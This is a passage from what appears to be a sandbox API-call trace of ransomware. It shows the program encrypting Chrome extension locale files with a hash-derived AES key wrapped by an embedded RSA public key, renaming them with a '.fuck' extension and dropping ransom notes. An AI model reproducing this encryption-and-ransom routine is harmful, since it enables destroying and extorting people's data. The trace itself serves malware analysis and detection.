Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.328] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.328] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.330] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.330] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.330] CryptHashData (hHash=0x29846a0, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.330] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.330] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.330] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.330] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2986548) returned 1 [0253.331] CryptImportPublicKeyInfo (in: hCryptProv=0x2986548, dwCertEncodingType=0x1, pInfo=0x2995830*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995860*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995868*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29854a0) returned 1 [0253.331] CryptEncrypt (in: hKey=0x29854a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.331] CryptEncrypt (in: hKey=0x29854a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986878*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986878*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.331] WriteFile (in: hFile=0x5d60, lpBuffer=0x2986878*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986878*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.332] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.333] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.333] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.333] CloseHandle (hObject=0x5d5c) returned 1 [0253.333] CloseHandle (hObject=0x5d60) returned 1 [0253.333] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json"), bFailIfExists=0) returned 1 [0253.336] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json", dwFileAttributes=0x0) returned 1 [0253.337] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.gsg")) returned 1 [0253.338] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.fuck")) returned 1 [0253.340] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.340] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.340] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.340] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.340] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.340] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\readme_back_files.htm")) returned 0xffffffff [0253.340] AreFileApisANSI () returned 1 [0253.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.340] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.341] GetFileType (hFile=0x5d50) returned 0x1 [0253.341] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.342] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.342] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.342] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.342] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.342] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.342] GetLastError () returned 0x0 [0253.342] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json")) returned 0x20 [0253.343] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json", dwFileAttributes=0x80) returned 1 [0253.344] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.344] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.345] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.345] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.348] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.348] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.348] CryptHashData (hHash=0x29846a0, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.348] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.348] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.348] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.348] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29866e0) returned 1 [0253.349] CryptImportPublicKeyInfo (in: hCryptProv=0x29866e0, dwCertEncodingType=0x1, pInfo=0x2995d10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995d40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995d48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985720) returned 1 [0253.349] CryptEncrypt (in: hKey=0x2985720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.349] CryptEncrypt (in: hKey=0x2985720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986fe8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986fe8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.349] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2986fe8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986fe8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.350] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xeb, lpOverlapped=0x0) returned 1 [0253.352] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xeb, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.352] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.352] CloseHandle (hObject=0x5d60) returned 1 [0253.352] CloseHandle (hObject=0x5d5c) returned 1 [0253.352] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json"), bFailIfExists=0) returned 1 [0253.358] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json", dwFileAttributes=0x0) returned 1 [0253.358] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.gsg")) returned 1 [0253.360] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.fuck")) returned 1 [0253.361] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.361] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.361] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.361] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.361] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.361] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\readme_back_files.htm")) returned 0xffffffff [0253.361] AreFileApisANSI () returned 1 [0253.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.362] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.362] GetFileType (hFile=0x5d50) returned 0x1 [0253.362] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.363] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.363] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.364] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.364] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.364] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.364] GetLastError () returned 0x0 [0253.364] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json")) returned 0x20 [0253.364] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json", dwFileAttributes=0x80) returned 1 [0253.365] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.365] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.367] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.368] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.370] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.370] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.370] CryptHashData (hHash=0x29846a0, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.370] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.371] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.371] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.371] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29865d0) returned 1 [0253.371] CryptImportPublicKeyInfo (in: hCryptProv=0x29865d0, dwCertEncodingType=0x1, pInfo=0x2995010*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995040*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995048*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29851e0) returned 1 [0253.371] CryptEncrypt (in: hKey=0x29851e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.371] CryptEncrypt (in: hKey=0x29851e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986c30*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986c30*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.371] WriteFile (in: hFile=0x5d60, lpBuffer=0x2986c30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986c30*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.372] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe5, lpOverlapped=0x0) returned 1 [0253.374] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, 